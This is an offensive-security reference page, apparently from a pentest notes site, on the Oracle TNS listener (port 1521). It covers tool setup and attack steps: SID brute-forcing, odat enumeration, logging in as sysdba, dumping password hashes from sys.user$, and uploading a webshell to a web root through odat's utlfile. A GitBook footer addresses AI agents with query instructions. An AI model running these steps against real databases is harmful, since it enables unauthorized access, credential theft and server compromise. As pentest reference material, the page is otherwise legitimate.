> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/utility/service/oracle-tns-1521.md).

# Oracle TNS (1521)

<details>

<summary>Protocol Information</summary>

Oracle TNS is a communication protocol that facilitates communication between Oracle databases and applications via networks. Oracle TNS is often used with other Oracle services such as Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, Web servers, and many others. It provides security through the application of different levels of encryption and error reporting and logging capability.

In Oracle RDBMS, a **`System Identifier (SID)`** is a unique name that identifies a particular database instance. In fact, a database can have multiple instances, each with its own System ID. Ex. In an Oracle RAC environment, a single physical database is accessible from multiple Oracle instances, spread across different nodes in a cluster. Each instance has its own unique SID, but all instances share the same set of database files. This configuration is used to provide scalability and high availability. SIDs are an essential part of the connection process, as they identify the specific database instance to which the client wishes to connect.

</details>

## Port

<table data-header-hidden><thead><tr><th width="166">Port</th><th>Description</th></tr></thead><tbody><tr><td><mark style="color:green;"><strong>1521</strong></mark><strong> TCP</strong></td><td>Oracle TNS</td></tr></tbody></table>

## Config File

In `$ORACLE_HOME/network/admin/:`

* **`tnsnames.ora`** : Each database or service has a unique entry in the tnsnames.ora file, containing the information necessary for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the name of the database or service that clients must use when connecting to the service. In other words, it resolves service names into network addresses, telling clients how to find the databases.
* **`listener.ora`** : Is a server-side configuration file that defines the properties and parameters of the listening process, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance. In other words, it configures the listener, which is the program that sits on the server and listens for connection requests from clients, telling the server how to listen for client requests.

## Interact

Installation of the necessary tools

{% code overflow="wrap" %}

```bash
#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
```

{% endcode %}

Documentation [HERE](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985).

{% code overflow="wrap" %}

```bash
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID>
```

{% endcode %}

```bash
> select table_name from all_tables;
> select * from user_role_privs;
> select name, password from sys.user$;
```

If you have an error with `sqlplus`

{% code overflow="wrap" %}

```bash
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
# or
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
```

{% endcode %}

## Attacks

### SID Bruteforcing

Nmap NSE: `--script oracle-sid-brute`

### Enumeration with [odat](https://github.com/quentinhardy/odat).

```
./odat.py all -s <IP>
```

### PrivEsc to sysdba

{% code overflow="wrap" %}

```bash
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID> as sysdba
```

{% endcode %}

```bash
> select * from user_role_privs;
> select name, password from sys.user$;
```

### Upload webshell to website (if present) with [odat](https://github.com/quentinhardy/odat).

{% code overflow="wrap" %}

```bash
./odat.py utlfile -s <IP> -d <SID> -U <USER> -P <PASS> --sysdba --putFile <PATH> <NameFileOnServer> ./<myFile>
# ex. <PATH> : C:\\inetpub\\wwwroot
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/utility/service/oracle-tns-1521.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.